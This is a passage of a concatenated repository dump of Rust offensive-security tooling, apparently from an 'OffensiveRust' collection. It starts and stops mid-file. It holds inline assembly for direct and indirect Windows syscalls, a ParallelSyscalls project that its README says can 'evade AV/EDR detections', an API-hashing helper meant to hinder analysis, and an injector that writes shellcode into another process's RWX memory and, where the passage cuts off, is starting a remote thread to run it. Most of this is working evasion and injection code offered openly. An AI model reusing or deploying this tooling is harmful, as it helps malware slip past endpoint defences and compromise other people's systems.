)+ 34 | freshycalls_syswhispers::syscall::do_syscall(ssn, addr, cnt, $($y), +) 35 | }} 36 | } 37 | 38 | #[cfg(target_arch = "x86_64")] 39 | #[cfg(all(feature = "_DIRECT_", not(feature = "_INDIRECT_")))] 40 | global_asm!( 41 | " 42 | .global do_syscall 43 | 44 | .section .text 45 | 46 | do_syscall: 47 | 48 | mov [rsp - 0x8], rsi 49 | mov [rsp - 0x10], rdi 50 | 51 | mov eax, ecx 52 | mov rcx, rdx 53 | 54 | mov r10, r8 55 | mov rdx, r9 56 | 57 | mov r8, [rsp + 0x28] 58 | mov r9, [rsp + 0x30] 59 | 60 | sub rcx, 0x4 61 | jle skip 62 | 63 | lea rsi, [rsp + 0x38] 64 | lea rdi, [rsp + 0x28] 65 | 66 | rep movsq 67 | skip: 68 | syscall 69 | 70 | mov rsi, [rsp - 0x8] 71 | mov rdi, [rsp - 0x10] 72 | 73 | ret 74 | " 75 | ); 76 | 77 | #[cfg(target_arch = "x86_64")] 78 | #[cfg(all(feature = "_INDIRECT_", not(feature = "_DIRECT_")))] 79 | global_asm!( 80 | " 81 | .global do_syscall 82 | 83 | .section .text 84 | 85 | do_syscall: 86 | mov [rsp - 0x8], rsi 87 | mov [rsp - 0x10], rdi 88 | mov [rsp - 0x18], r12 89 | 90 | mov eax, ecx 91 | mov r12, rdx 92 | mov rcx, r8 93 | 94 | mov r10, r9 95 | mov rdx, [rsp + 0x28] 96 | mov r8, [rsp + 0x30] 97 | mov r9, [rsp + 0x38] 98 | 99 | sub rcx, 0x4 100 | jle skip 101 | 102 | lea rsi, [rsp + 0x40] 103 | lea rdi, [rsp + 0x28] 104 | 105 | rep movsq 106 | skip: 107 | 108 | mov rcx, r12 109 | 110 | mov rsi, [rsp - 0x8] 111 | mov rdi, [rsp - 0x10] 112 | mov r12, [rsp - 0x18] 113 | 114 | jmp rcx 115 | " 116 | ); 117 | 118 | #[cfg(target_arch = "x86")] 119 | #[cfg(all(feature = "_DIRECT_", not(feature = "_INDIRECT_")))] 120 | global_asm!( 121 | " 122 | .global _do_syscall 123 | 124 | .section .text 125 | 126 | _do_syscall: 127 | mov [esp - 0x04], esi 128 | mov [esp - 0x08], edi 129 | 130 | mov eax, [esp + 0x04] 131 | mov ecx, [esp + 0x08] 132 | 133 | lea esi, [esp + 0x0C] 134 | lea edi, [esp + 0x04] 135 | 136 | rep movsd 137 | 138 | mov esi, [esp - 0x04] 139 | mov edi, [esp - 0x08] 140 | 141 | mov edx, fs:[0xc0] 142 | test edx, edx 143 | je native 144 | 145 | call edx 146 | ret 147 | 148 | native: 149 | call sysenter 150 | ret 151 | 152 | sysenter: 153 | mov edx,esp 154 | sysenter 155 | 156 | " 157 | ); 158 | 159 | #[cfg(target_arch = "x86")] 160 | #[cfg(all(feature = "_INDIRECT_", not(feature = "_DIRECT_")))] 161 | global_asm!( 162 | " 163 | .global _do_syscall 164 | 165 | .section .text 166 | 167 | _do_syscall: 168 | mov ecx, [esp + 0x0C] 169 | not ecx 170 | add ecx, 1 171 | lea edx, [esp + ecx * 4] 172 | 173 | mov ecx, [esp] 174 | mov [edx], ecx 175 | 176 | mov [edx - 0x04], esi 177 | mov [edx - 0x08], edi 178 | 179 | mov eax, [esp + 0x04] 180 | mov ecx, [esp + 0x0C] 181 | 182 | lea esi, [esp + 0x10] 183 | lea edi, [edx + 0x04] 184 | 185 | rep movsd 186 | 187 | mov esi, [edx - 0x04] 188 | mov edi, [edx - 0x08] 189 | mov ecx, [esp + 0x08] 190 | 191 | mov esp, edx 192 | 193 | mov edx, fs:[0xC0] 194 | test edx, edx 195 | je native 196 | 197 | mov edx, fs:[0xC0] 198 | jmp ecx 199 | 200 | native: 201 | mov edx, ecx 202 | sub edx, 0x05 203 | push edx 204 | mov edx, esp 205 | jmp ecx 206 | ret 207 | 208 | is_wow64: 209 | " 210 | ); 211 | 212 | #[cfg(target_arch = "x86_64")] 213 | #[cfg(all(feature = "_DIRECT_", not(feature = "_INDIRECT_")))] 214 | extern "C" { 215 | pub fn do_syscall(ssn: u16, n_args: u32, ...) -> i32; 216 | } 217 | 218 | #[cfg(target_arch = "x86_64")] 219 | #[cfg(all(feature = "_INDIRECT_", not(feature = "_DIRECT_")))] 220 | extern "C" { 221 | pub fn do_syscall(ssn: u16, syscall_addr: u64, n_args: u32, ...) -> i32; 222 | } 223 | 224 | #[cfg(target_arch = "x86")] 225 | #[cfg(all(feature = "_DIRECT_", not(feature = "_INDIRECT_")))] 226 | extern "C" { 227 | pub fn do_syscall(ssn: u16, n_args: u32, ...) -> i32; 228 | } 229 | 230 | #[cfg(target_arch = "x86")] 231 | #[cfg(all(feature = "_INDIRECT_", not(feature = "_DIRECT_")))] 232 | extern "C" { 233 | pub fn do_syscall(ssn: u16, n_args: u32, syscall_addr: u32, ...) -> i32; 234 | } 235 | -------------------------------------------------------------------------------- /memN0ps/mordor-rs/freshycalls_syswhispers/tests/syscaller.rs: -------------------------------------------------------------------------------- 1 | #[cfg(test)] 2 | mod tests { 3 | use std::ptr::null_mut; 4 | 5 | use freshycalls_syswhispers::syscall_resolve::get_process_id_by_name; 6 | use freshycalls_syswhispers::syscall; 7 | use ntapi::{winapi::shared::ntdef::{OBJECT_ATTRIBUTES, HANDLE, NT_SUCCESS}, ntapi_base::CLIENT_ID}; 8 | use windows_sys::Win32::System::{Threading::{PROCESS_VM_READ, PROCESS_VM_WRITE}}; 9 | 10 | #[test] 11 | fn test_open_process() { 12 | env_logger::init(); 13 | 14 | let mut oa = OBJECT_ATTRIBUTES::default(); 15 | 16 | let process_id = get_process_id_by_name("notepad.exe"); 17 | let mut process_handle = process_id as HANDLE; 18 | 19 | let mut ci = CLIENT_ID { 20 | UniqueProcess: process_handle, 21 | UniqueThread: null_mut(), 22 | }; 23 | 24 | let status = unsafe { 25 | syscall!( 26 | "NtOpenProcess", 27 | &mut process_handle, 28 | PROCESS_VM_WRITE | PROCESS_VM_READ, 29 | &mut oa, 30 | &mut ci 31 | ) 32 | }; 33 | 34 | assert_eq!(NT_SUCCESS(status), true); 35 | } 36 | } -------------------------------------------------------------------------------- /memN0ps/mordor-rs/hells_halos_tartarus_gate/.gitignore: -------------------------------------------------------------------------------- 1 | /target 2 | -------------------------------------------------------------------------------- /memN0ps/mordor-rs/hells_halos_tartarus_gate/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "hells_halos_tartarus_gate" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | env_logger = "0.9.0" 10 | log = "0.4.17" 11 | sysinfo = "0.20.4" 12 | obfstr = "0.3.0" 13 | ntapi = "0.4.0" 14 | 15 | [dependencies.windows-sys] 16 | version = "0.36.1" 17 | features = [ 18 | "Win32_Foundation", 19 | "Win32_Security", 20 | "Win32_System_Threading", 21 | "Win32_UI_WindowsAndMessaging", 22 | "Win32_System_Memory", 23 | "Win32_System_Diagnostics_Debug", 24 | "Win32_System_SystemServices", 25 | "Win32_System_WindowsProgramming", 26 | "Win32_System_LibraryLoader", 27 | ] -------------------------------------------------------------------------------- /memN0ps/mordor-rs/hooking.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/memN0ps/mordor-rs/hooking.png -------------------------------------------------------------------------------- /memN0ps/mordor-rs/syswhisper2_example1.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/memN0ps/mordor-rs/syswhisper2_example1.PNG -------------------------------------------------------------------------------- /memN0ps/mordor-rs/syswhisper2_example2.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/memN0ps/mordor-rs/syswhisper2_example2.PNG -------------------------------------------------------------------------------- /memN0ps/pemadness-rs/.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /memN0ps/pemadness-rs/.gitignore: -------------------------------------------------------------------------------- 1 | # Generated by Cargo 2 | # will have compiled files and executables 3 | debug/ 4 | target/ 5 | 6 | # Remove Cargo.lock from gitignore if creating an executable, leave it for libraries 7 | # More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html 8 | Cargo.lock 9 | 10 | # These are backup files generated by rustfmt 11 | **/*.rs.bk 12 | 13 | # MSVC Windows builds of rustc generate these, which store debugging information 14 | *.pdb 15 | -------------------------------------------------------------------------------- /memN0ps/pemadness-rs/.vscode/launch.json: -------------------------------------------------------------------------------- 1 | { 2 | // Use IntelliSense to learn about possible attributes. 3 | // Hover to view descriptions of existing attributes. 4 | // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387 5 | "version": "0.2.0", 6 | "configurations": [ 7 | { 8 | "type": "lldb", 9 | "request": "launch", 10 | "name": "Debug", 11 | "program": "${workspaceFolder}/pemadness/target/debug/pemadness.exe", 12 | "args": [], 13 | "cwd": "${workspaceFolder}" 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /memN0ps/pemadness-rs/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 memN0ps 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /memN0ps/pemadness-rs/README.md: -------------------------------------------------------------------------------- 1 | # PE Madness 2 | 3 | Portable Executable Parsing Library (PE Parsing Library) 4 | 5 | ## Description 6 | 7 | Why?...Why not? :P 8 | 9 | I made this library because I wanted to learn about parsing portable executable (PE) files in Rust even though there is a much better crate [pelite](https://docs.rs/pelite/latest/pelite/). 10 | 11 | This library intentionally uses `windows-sys` crate and `unsafe` code and it's coded the way it is because when making [Reflective DLL Injection / Shellcode Reflective DLL Injection](https://github.com/memN0ps/srdi-rs) it is not possible to use heap allocated memory and anything dynamically sized must be put on a stack and all external functions can't be used until you resolve imports. 12 | 13 | When self-loading or emulating `LoadLibraryA`, your code needs to be entirely self-contained and not rely on `libc` or any other (implicit) external API otherwise it becomes dependent on the loader. Also, instead of using the [obfstr](https://crates.io/crates/obfstr) crate to obfuscate strings, hashes are used instead to make dynamic analysis more difficult. 14 | 15 | 16 | ## References and Credits 17 | 18 | * https://discord.com/invite/rust-lang-community (Rust Community #windows-dev channel) 19 | * https://github.com/janoglezcampos/rust_syscalls/ 20 | * https://github.com/not-matthias/mmap/ 21 | * https://github.com/Ben-Lichtman/reloader/ 22 | * https://github.com/2vg/blackcat-rs/ 23 | * https://github.com/Kudaes/DInvoke_rs/ 24 | * https://github.com/zorftw/kdmapper-rs/ 25 | * https://github.com/MrElectrify/mmap-loader-rs/ 26 | * https://github.com/kmanc/remote_code_oxidation 27 | * https://github.com/trickster0/OffensiveRust 28 | * https://docs.microsoft.com/en-us/windows/win32/debug/pe-format 29 | * https://crates.io/crates/pelite -------------------------------------------------------------------------------- /memN0ps/pemadness-rs/pemadness/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "pemadness" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | [profile.release] 8 | opt-level = "z" # Optimize for size. 9 | lto = true # Enable Link Time Optimization 10 | codegen-units = 1 # Reduce number of codegen units to increase optimizations. 11 | panic = "abort" # Abort on panic 12 | strip = true # Automatically strip symbols from the binary. 13 | 14 | [dependencies] 15 | env_logger = "0.9.0" 16 | log = "0.4.17" 17 | sysinfo = "0.20.4" 18 | obfstr = "0.3.0" 19 | ntapi = "0.3.7" 20 | 21 | [dependencies.windows-sys] 22 | version = "0.36.1" 23 | features = [ 24 | "Win32_Foundation", 25 | "Win32_Security", 26 | "Win32_System_Threading", 27 | "Win32_UI_WindowsAndMessaging", 28 | "Win32_System_Memory", 29 | "Win32_System_Diagnostics_Debug", 30 | "Win32_System_SystemServices", 31 | "Win32_System_WindowsProgramming", 32 | "Win32_System_LibraryLoader", 33 | ] -------------------------------------------------------------------------------- /memN0ps/psyscalls-rs/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 memN0ps 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /memN0ps/psyscalls-rs/README.md: -------------------------------------------------------------------------------- 1 | # ParallelSyscalls 2 | 3 | Rust version of MDSec's ParallelSyscalls research: https://github.com/mdsecactivebreach/ParallelSyscalls/ and https://www.mdsec.co.uk/2022/01/edr-parallel-asis-through-analysis/ 4 | 5 | This code can be used to load a fresh copy of `NTDLL.dll` using system calls and extract system calls from the fresh copy of `NTDLL.dll` to call any Win32 API function of your choice. This may allow you to evade AV/EDR detections. Please note that the syscall stubs are allocated using `RWX` memory created using `VirtualAlloc()`, which is not optimal from an OPSEC perspective. 6 | 7 | 8 | Writing a tool and a blog post by doing self-research has helped me learn a lot more than anything I've ever done: https://memn0ps.github.io/parallel-syscalls/ 9 | 10 | 11 | ## Why Rust? 12 | 13 | Why not? Rust is awesome! A low-level statically (compiled) and strongly typed systems programming language that is faster than C/C++, allowing you to achieve memory safety, concurrency and perform low-level tasks writing high-level code with an excellent compiler, community and documentation. I have moved away from my old favourite languages C/C++/C#, and started my new Rusty adventure. 14 | 15 | This project has allowed me to learn about Rust Windows Internals and enhance my red teaming skills. I'm relatively new to Rust, but I firmly believe Rust is the future for robust programs, red teaming and malware development. 16 | 17 | ![ntdlll](./ntdll.png) 18 | 19 | ## Example 20 | 21 | 1. Import the "parallel_syscalls" library using `mod parallel_syscalls;` 22 | 23 | 2. Create a function pointer type such as `NtCreateThreadEx` https://docs.rs/ntapi/0.3.6/ntapi/ntpsapi/fn.NtCreateThreadEx.html 24 | 25 | 3. Call the function `get_module_base_address("ntdll")` to load a fresh copy of NTDLL using MDSec's Parallel Syscalls technique. 26 | 27 | 4. Call the function `get_function_address(ptr_ntdll, "NtCreateThreadEx")` and pass in NTDLL's base address 28 | 29 | 5. Call the function as you would normally `nt_create_thread_ex(&mut thread_handle, GENERIC_ALL, null_mut(), GetCurrentProcess(), null_mut(), null_mut(), 0, 0, 0, 0, null_mut())` 30 | 31 | 6. Profit \x90 32 | 33 | 34 | ## References 35 | 36 | * https://www.mdsec.co.uk/2022/01/edr-parallel-asis-through-analysis/ 37 | * https://github.com/mdsecactivebreach/ParallelSyscalls/ 38 | * https://github.com/cube0x0/ParallelSyscalls/ 39 | * https://github.com/frkngksl/ParallelNimcalls/ 40 | * https://doc.rust-lang.org/book/ 41 | * https://github.com/microsoft/windows-rs 42 | * https://crates.io/crates/ntapi 43 | * https://crates.io/crates/winapi 44 | * https://crates.io/crates/bstr 45 | * https://twitter.com/MrUn1k0d3r (MrUn1k0d3r's Discord community / Waldo-IRC) 46 | * https://github.com/felix-rs/ntcall-rs/ (Thanks felix-rs) 47 | * https://github.com/Kudaes/DInvoke_rs 48 | * https://github.com/kmanc/remote_code_oxidation 49 | * https://github.com/zorftw/kdmapper-rs 50 | * https://github.com/trickster0/OffensiveRust 51 | * https://twitter.com/rustlang - (Rust Community Discord: Nick12#9400, B3NNY#8794, MaulingMonkey#1444, Zuix#4359, WithinRafael#7014, Jess Gaming#8850, madfrog#5492 and many more) 52 | 53 | 54 | -------------------------------------------------------------------------------- /memN0ps/psyscalls-rs/ntdll.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/memN0ps/psyscalls-rs/ntdll.png -------------------------------------------------------------------------------- /memN0ps/psyscalls-rs/parallel_syscalls/.gitignore: -------------------------------------------------------------------------------- 1 | # Generated by Cargo 2 | # will have compiled files and executables 3 | /target/ 4 | 5 | # Remove Cargo.lock from gitignore if creating an executable, leave it for libraries 6 | # More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html 7 | Cargo.lock 8 | 9 | # These are backup files generated by rustfmt 10 | **/*.rs.bk 11 | -------------------------------------------------------------------------------- /memN0ps/psyscalls-rs/parallel_syscalls/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "parallel_syscalls" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | winapi = { version = "0.3.9", features = ["processthreadsapi", "memoryapi"] } 10 | ntapi = "0.3.7" 11 | bstr = "0.2.17" -------------------------------------------------------------------------------- /memN0ps/psyscalls-rs/parallel_syscalls/src/main.rs: -------------------------------------------------------------------------------- 1 | use std::{ptr::null_mut, intrinsics::transmute}; 2 | use ntapi::ntpsapi::PPS_ATTRIBUTE_LIST; 3 | use winapi::{um::{winnt::{ACCESS_MASK, GENERIC_ALL}, processthreadsapi::GetCurrentProcess}, shared::{ntdef::{PHANDLE, POBJECT_ATTRIBUTES, HANDLE, PVOID, NTSTATUS, NT_SUCCESS}, minwindef::ULONG, basetsd::SIZE_T}, ctypes::c_void}; 4 | 5 | mod parallel_syscalls; 6 | 7 | // Function to call 8 | type NtCreateThreadEx = unsafe extern "system" fn( 9 | ThreadHandle: PHANDLE, 10 | DesiredAccess: ACCESS_MASK, 11 | ObjectAttributes: POBJECT_ATTRIBUTES, 12 | ProcessHandle: HANDLE, 13 | StartRoutine: PVOID, 14 | Argument: PVOID, 15 | CreateFlags: ULONG, 16 | ZeroBits: SIZE_T, 17 | StackSize: SIZE_T, 18 | MaximumStackSize: SIZE_T, 19 | AttributeList: PPS_ATTRIBUTE_LIST 20 | ) -> NTSTATUS; 21 | 22 | 23 | fn main() { 24 | 25 | // Dynamically get the base address of a fresh copy of ntdll.dll using mdsec's technique 26 | let ptr_ntdll = parallel_syscalls::get_module_base_address("ntdll.dll"); 27 | 28 | if ptr_ntdll.is_null() { 29 | panic!("Pointer to ntdll is null"); 30 | } 31 | 32 | //get function address 33 | let nt_create_thread_ex_address = parallel_syscalls::get_function_address(ptr_ntdll, "NtCreateThreadEx"); 34 | 35 | //build system call stub 36 | //let nt_create_thread_ex = parallel_syscalls::build_syscall_stub(syscall_nt_create_thread_ex as u32); 37 | 38 | // Convert to function pointer 39 | let nt_create_thread_ex = unsafe { transmute::<_, NtCreateThreadEx>(nt_create_thread_ex_address) }; 40 | let mut thread_handle : *mut c_void = null_mut(); 41 | 42 | // Call the function pointer in the memory region 43 | let status = unsafe { nt_create_thread_ex(&mut thread_handle, GENERIC_ALL, null_mut(), GetCurrentProcess(), null_mut(), null_mut(), 0, 0, 0, 0, null_mut()) }; 44 | 45 | if !NT_SUCCESS(status) { 46 | panic!("Failed to call NtCreateThreadEx"); 47 | } 48 | 49 | println!("[+] Thread Handle: {:?} and Status: {:?}", thread_handle, status); 50 | } -------------------------------------------------------------------------------- /memN0ps/srdi-rs/.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /memN0ps/srdi-rs/.gitignore: -------------------------------------------------------------------------------- 1 | # Generated by Cargo 2 | # will have compiled files and executables 3 | debug/ 4 | target/ 5 | 6 | # Remove Cargo.lock from gitignore if creating an executable, leave it for libraries 7 | # More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html 8 | Cargo.lock 9 | 10 | # These are backup files generated by rustfmt 11 | **/*.rs.bk 12 | 13 | # MSVC Windows builds of rustc generate these, which store debugging information 14 | *.pdb 15 | 16 | *.bin -------------------------------------------------------------------------------- /memN0ps/srdi-rs/Cargo.toml: -------------------------------------------------------------------------------- 1 | [workspace] 2 | 3 | members = [ 4 | "hash_calculator", 5 | "testdll", 6 | "reflective_loader", 7 | "generate_shellcode", 8 | "inject", 9 | ] -------------------------------------------------------------------------------- /memN0ps/srdi-rs/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 memN0ps 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /memN0ps/srdi-rs/Makefile.toml: -------------------------------------------------------------------------------- 1 | [env] 2 | NAME = "srdi" 3 | DEV = false 4 | PROD = false 5 | 6 | [env.development] 7 | DEV = true 8 | 9 | [env.production] 10 | PROD = true -------------------------------------------------------------------------------- /memN0ps/srdi-rs/generate_shellcode/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "generate_shellcode" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | sysinfo = "0.20.4" 10 | log = "0.4.17" 11 | env_logger = "0.9.0" 12 | 13 | [dependencies.windows-sys] 14 | version = "0.36.1" 15 | features = [ 16 | "Win32_Foundation", 17 | "Win32_Security", 18 | "Win32_System_Threading", 19 | "Win32_UI_WindowsAndMessaging", 20 | "Win32_System_Memory", 21 | "Win32_System_Diagnostics_Debug", 22 | "Win32_System_SystemServices" 23 | ] -------------------------------------------------------------------------------- /memN0ps/srdi-rs/hash_calculator/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "hash_calculator" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | -------------------------------------------------------------------------------- /memN0ps/srdi-rs/hash_calculator/src/main.rs: -------------------------------------------------------------------------------- 1 | fn main() { 2 | let kernel32 = "KERNEL32.DLL".as_bytes(); 3 | println!("KERNEL32.DLL: {:#x}", hash(kernel32)); 4 | 5 | let ntdll = "ntdll.dll".as_bytes(); 6 | println!("ntdll.dll: {:#x}", hash(ntdll)); 7 | 8 | let load_library_a = "LoadLibraryA".as_bytes(); 9 | println!("LoadLibraryA: {:#x}", hash(load_library_a)); 10 | 11 | let get_proc_address = "GetProcAddress".as_bytes(); 12 | println!("GetProcAddress: {:#x}", hash(get_proc_address)); 13 | 14 | let virtual_alloc = "VirtualAlloc".as_bytes(); 15 | println!("VirtualAlloc: {:#x}", hash(virtual_alloc)); 16 | 17 | let virtual_protect = "VirtualProtect".as_bytes(); 18 | println!("VirtualProtect: {:#x}", hash(virtual_protect)); 19 | 20 | let flush_instruction_cache = "FlushInstructionCache".as_bytes(); 21 | println!( 22 | "FlushInstructionCache: {:#x}", 23 | hash(flush_instruction_cache) 24 | ); 25 | 26 | let virtual_free = "VirtualFree".as_bytes(); 27 | println!("VirtualFree: {:#x}", hash(virtual_free)); 28 | 29 | let exit_thread = "ExitThread".as_bytes(); 30 | println!("ExitThread: {:#x}", hash(exit_thread)); 31 | 32 | let say_hello = "SayHello".as_bytes(); 33 | println!("SayHello: {:#x}", hash(say_hello)); 34 | } 35 | 36 | //credits: janoglezcampos / @httpyxel / yxel 37 | pub fn hash(buffer: &[u8]) -> u32 { 38 | let mut hsh: u32 = 5381; 39 | let mut iter: usize = 0; 40 | let mut cur: u8; 41 | 42 | while iter < buffer.len() { 43 | cur = buffer[iter]; 44 | if cur == 0 { 45 | iter += 1; 46 | continue; 47 | } 48 | if cur >= ('a' as u8) { 49 | cur -= 0x20; 50 | } 51 | hsh = ((hsh << 5).wrapping_add(hsh)) + cur as u32; 52 | iter += 1; 53 | } 54 | return hsh; 55 | } 56 | -------------------------------------------------------------------------------- /memN0ps/srdi-rs/inject/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "inject" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | sysinfo = "0.20.4" 10 | log = "0.4.17" 11 | env_logger = "0.9.0" 12 | 13 | [dependencies.windows-sys] 14 | version = "0.36.1" 15 | features = [ 16 | "Win32_Foundation", 17 | "Win32_Security", 18 | "Win32_System_Threading", 19 | "Win32_UI_WindowsAndMessaging", 20 | "Win32_System_Memory", 21 | "Win32_System_Diagnostics_Debug", 22 | "Win32_System_SystemServices" 23 | ] -------------------------------------------------------------------------------- /memN0ps/srdi-rs/inject/src/main.rs: -------------------------------------------------------------------------------- 1 | use std::{env, ptr::null_mut}; 2 | use sysinfo::{Pid, ProcessExt, SystemExt}; 3 | use windows_sys::Win32::{ 4 | Foundation::CloseHandle, 5 | System::{ 6 | Diagnostics::Debug::WriteProcessMemory, 7 | Memory::{VirtualAllocEx, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE}, 8 | Threading::{CreateRemoteThread, OpenProcess, PROCESS_ALL_ACCESS}, 9 | }, 10 | }; 11 | 12 | fn main() { 13 | env_logger::init(); 14 | 15 | let args: Vec = env::args().collect(); 16 | 17 | if args.len() < 2 { 18 | println!("Usage: inject.exe "); 19 | std::process::exit(1); 20 | } 21 | 22 | let process_name = &args[1]; 23 | let file_path = &args[2]; 24 | 25 | let process_id = get_process_id_by_name(process_name) as u32; 26 | log::debug!("[+] Process ID: {}", process_id); 27 | 28 | //let image_bytes = include_bytes!(r"C:\Users\memn0ps\Documents\GitHub\srdi-rs\shellcode.bin"); 29 | let image_bytes = std::fs::read(file_path).expect("Failed to read the file path"); 30 | let module_size = image_bytes.len(); 31 | let module_base = image_bytes.as_ptr(); 32 | 33 | // Get a handle to the target process with PROCESS_ALL_ACCESS 34 | let process_handle = unsafe { OpenProcess(PROCESS_ALL_ACCESS, 0, process_id) }; 35 | 36 | if process_handle == 0 { 37 | panic!("Failed to open a handle to the target process"); 38 | } 39 | 40 | log::debug!("[+] Process handle: {:?}", process_handle); 41 | 42 | // Allocate memory in the target process for the shellcode 43 | let shellcode_address = unsafe { 44 | VirtualAllocEx( 45 | process_handle, 46 | null_mut(), 47 | module_size, // was sizeOfImage for RDI 48 | MEM_COMMIT | MEM_RESERVE, 49 | PAGE_EXECUTE_READWRITE, 50 | ) 51 | }; 52 | 53 | log::debug!( 54 | "[+] Allocated memory in the target process for the shellcode: {:p}", 55 | shellcode_address 56 | ); 57 | 58 | if shellcode_address.is_null() { 59 | panic!("Failed to allocate memory in the target process for the shellcode"); 60 | } 61 | 62 | // Write the shellcode to the target process 63 | let wpm_result = unsafe { 64 | WriteProcessMemory( 65 | process_handle, 66 | shellcode_address as _, 67 | module_base as _, 68 | module_size, // was sizeOfImage for RDI 69 | null_mut(), 70 | ) 71 | }; 72 | 73 | if wpm_result == 0 { 74 | panic!("Failed to write the image to the target process"); 75 | } 76 | 77 | //For debugging 78 | //pause(); 79 | 80 | // Create remote thread and execute our shellcode 81 | let thread_handle = unsafe { 82 | 